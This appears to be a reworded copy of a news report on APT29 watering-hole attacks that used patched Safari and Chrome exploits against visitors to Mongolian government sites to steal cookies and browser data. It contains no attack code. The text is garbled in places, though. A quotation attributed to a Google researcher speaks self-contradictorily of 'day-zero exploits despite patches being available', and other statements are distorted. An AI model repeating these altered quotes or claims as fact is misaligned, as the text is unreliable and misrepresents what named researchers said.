Russian Cybercriminals Exploit Vulnerabilities in Safari and Chrome in Notable Cyberattack

Aug 29, 2024Ravie LakshmananBrowser Security / Vulnerability

A group of cybersecurity researchers has identified numerous real-world campaigns exploiting now-resolved vulnerabilities in Apple Safari and Google Chrome browsers to distribute malware aimed at mobile users to steal sensitive information.

Notably, Google Threat Analysis Group (TAG) researcher Clement Lecigne stated in a report given to The Hacker News, “These campaigns used day-zero exploits despite patches being available, and were successful in penetrating devices that had not applied the patches.”

These activities, happening between November 2023 and July 2024, stand out for utilizing a watering hole technique on Mongolian government websites, cabinet.gov[.]mn and mfa.gov[.]mn, to deploy the exploits.

The attribution of these attacks with moderate certainty goes to a Russian state-sponsored threat group known as APT29 (Midnight Blizzard), drawing parallels between the attacks and those associated with commercial surveillance companies such as Intellexa and NSO Group, indicating a reuse of exploits.

The vulnerabilities exploited in these campaigns are as follows –

• CVE-2023-41993 – A vulnerability in WebKit leading to potential execution of code while processing specific web content (Rectified by Apple in iOS 16.7 and Safari 16.6.1 in September 2023)

• CVE-2024-4671 – A flaw in Chrome’s Visuals module causing potential execution of code (Addressed by Google in Chrome version 124.0.6367.201/.202 for Windows and macOS, and version 124.0.6367.201 for Linux in May 2024)

• CVE-2024-5274 – A defect in the V8 JavaScript and WebAssembly engine leading to potential code execution (Fixed by Google in Chrome version 125.0.6422.112/.113 for Windows and macOS, and version 125.0.6422.112 for Linux in May 2024)

According to reports, the November 2023 and February 2024 incidents involved compromising the two Mongolian government sites – both cabinet.gov[.]mn initially and then sole mfa.gov[.]mn later – to disseminate an exploit for CVE-2023-41993 through a malicious iframe that pointed to a domain controlled by the threat actor.

When the Mongolian government websites were visited on an iPhone or iPad device, a reconnaissance payload was delivered through an iframe on the watering hole sites. After conducting validation checks, the payload would download and execute a malicious payload with the WebKit exploit to swipe browsing cookies from the device.

The malicious framework for stealing cookies detailed by Google TAG had previously been brought to light in relation to the 2021 exploitation of an iOS vulnerability (CVE-2021-1879) to steal authentication cookies from major websites like Google, Microsoft, LinkedIn, Facebook, Yahoo, GitHub, and Apple iCloud, and transmit them through WebSocket to an IP address controlled by attackers.

At the time, Google highlighted, “For the cookies to be successfully stolen, the victim needed active sessions on these websites via Safari,” and mentioned, “The perpetrators used LinkedIn messages to target government officers from western European nations by sending them malicious URLs.”

Furthermore, the specificity of the cookie-stealing tool pointing at “webmail.mfa.gov[.]mn” hints towards Mongolian government personnel potentially being the primary targets of the iOS operation.

Subsequently, in July 2024, the mfa.gov[.]mn portal underwent a third compromise, introducing JavaScript code that redirected Android users using Chrome to a malicious link that delivered an exploit chain leveraging CVE-2024-5274 and CVE-2024-4671 to deploy a payload designed to pilfer browser information.

The hack progression exploits CVE-2024-5274 to infiltrate the renderer and CVE-2024-4671 to accomplish a sandbox breach, eventually enabling a breakout from Chrome’s site isolation defenses and distributing a thief malware.

“This assault dispatches a straightforward program that eliminates all Chrome Crashing reports and transports the subsequent Chrome databases to the server track-adv[.]com – mirroring the basic end payload identified in past iOS campaigns,” as quoted by Google TAG.

The tech titan also stated that the methods used in the watering hole strategy in November 2023 and by Intellexa in September 2023 share the same activation code, a trend also noticed in the triggers for CVE-2024-5274 utilized in the July 2024 watering hole operation and by NSO Group in May 2024.

Additionally, the exploitation of CVE-2024-4671 is believed to have resemblances with a prior Chrome sandbox break that Intellexa was detected leveraging in connection with another Chrome vulnerability CVE-2021-37973, which was patched by Google in September 2021.

Although the means by which the attackers obtained the exploits for the three vulnerabilities remain undisclosed, the revelations emphasize the fact that governmental agencies are utilizing n-day exploits that were primarily zero-days by CSVs.

It raises the speculation that the exploits might have been procured from a vulnerability agent who previously sold them to the spyware vendors as zero-days, a continuous supply of which sustains the momentum as Apple and Google fortify defenses.

“Furthermore, watering hole assaults still pose a menace where sophisticated exploits can be employed to target regular site visitors, including mobile users,” the researchers mentioned. “Watering holes can be an effective channel for n-day exploits to mass target a demographic that may still have unpatched browsers.”